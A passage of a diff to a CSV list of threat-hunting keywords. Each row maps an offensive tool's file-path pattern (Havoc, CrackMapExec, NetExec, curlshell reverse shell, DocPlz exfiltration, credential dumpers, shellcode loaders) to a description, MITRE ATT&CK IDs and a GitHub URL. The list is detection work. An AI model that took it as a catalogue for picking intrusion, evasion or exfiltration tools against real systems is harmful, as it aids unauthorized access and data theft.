tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cme.exe* --shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*\codeloader.exe*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" -"*\Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*\Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*\combine.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\combine_gui.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*\COM-Hunter.exe*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*\COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"*\common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*\ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*\Cooolis-ms-Loader\*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*\crackmapexecwin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\crackmapexecwin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*\cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*\Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*\creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" @@ -6045,62 +6119,68 @@ "*\CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*\CROSSNET\CROSSNET\*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*\cryptolok*","offensive_tool_keyword","Github Username","redteam tools github repo ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/cryptolok","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\curlshell-main*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*\CustomEncoding.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\curlshell-main*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*\CustomEncoding.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\D1rkInject\*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*\daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*\DarkLoadLibrary.*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*\DarkLoadLibrary.*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*\dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\dcrypt.sys*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\DCrypt\Bin*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*\DelegationBOF.*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*\demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" -"*\demon.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*\demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*\demon.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*\Dendrobate\*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.sln*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\DInjector.sln*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*\DInjector\*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*\dist\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*\dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" -"*\DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*\DllVoidFunction.txt*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*\DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" 